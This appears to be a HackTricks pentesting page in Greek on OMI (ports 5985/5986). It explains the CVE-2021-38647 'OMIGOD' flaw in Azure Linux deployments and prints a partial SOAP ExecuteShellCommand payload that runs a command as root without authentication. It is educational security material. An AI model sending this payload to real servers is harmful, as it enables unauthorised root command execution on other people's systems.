6.3 KiB
5985,5986 - Πεντεστινγκ OMI
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
- Εργάζεστε σε μια εταιρεία κυβερνοασφάλειας; Θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks; Ή θέλετε να έχετε πρόσβαση στην τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF; Ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Εγγραφείτε 💬 στην ομάδα Discord ή στην ομάδα τηλεγραφήματος ή ακολουθήστε με στο Twitter 🐦@carlospolopm.
- Μοιραστείτε τα χάκινγκ τρικς σας υποβάλλοντας PRs στο αποθετήριο hacktricks και αποθετήριο hacktricks-cloud.
Βασικές Πληροφορίες
Το OMI παρουσιάζεται ως ένα εργαλείο ανοικτού κώδικα από τη Microsoft, σχεδιασμένο για την απομακρυσμένη διαχείριση ρυθμίσεων. Είναι ιδιαίτερα σημαντικό για τους διακομιστές Linux στο Azure που χρησιμοποιούν υπηρεσίες όπως:
- Azure Automation
- Azure Automatic Update
- Azure Operations Management Suite
- Azure Log Analytics
- Azure Configuration Management
- Azure Diagnostics
Η διαδικασία omiengine
εκκινείται και ακούει σε όλα τα διασυνδέσματα ως root όταν αυτές οι υπηρεσίες ενεργοποιούνται.
Τα προεπιλεγμένα θύρα που χρησιμοποιούνται είναι τα 5985 (http) και 5986 (https).
CVE-2021-38647 Ευπάθεια
Όπως παρατηρήθηκε στις 16 Σεπτεμβρίου, οι διακομιστές Linux που έχουν αναπτυχθεί στο Azure με τις αναφερόμενες υπηρεσίες είναι ευάλωτοι λόγω μιας ευπάθειας στην έκδοση του OMI. Αυτή η ευπάθεια βρίσκεται στην επεξεργασία των μηνυμάτων του διακομιστή OMI μέσω του /wsman
endpoint χωρίς να απαιτείται ένας κεφαλίδα Πιστοποίησης, εξουσιοδοτώντας εσφαλμένα τον πελάτη.
Ένας επιτιθέμενος μπορεί να εκμεταλλευτεί αυτό αποστέλλοντας ένα SOAP πακέτο "ExecuteShellCommand" χωρίς κεφαλίδα Πιστοποίησης, αναγκάζοντας τον διακομιστή να εκτελέσει εντολές με δικαιώματα root.
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
Για περισσότερες πληροφορίες σχετικά με αυτήν την CVE ελέγξτε αυτό.
Αναφορές
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
- https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/
Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
- Εργάζεστε σε μια εταιρεία κυβερνοασφάλειας; Θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks; Ή θέλετε να έχετε πρόσβαση στην τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF; Ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Συμμετάσχετε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε με στο Twitter 🐦@carlospolopm.
- Μοιραστείτε τα κόλπα σας στο hacking υποβάλλοντας PRs στο αποθετήριο hacktricks και αποθετήριο hacktricks-cloud.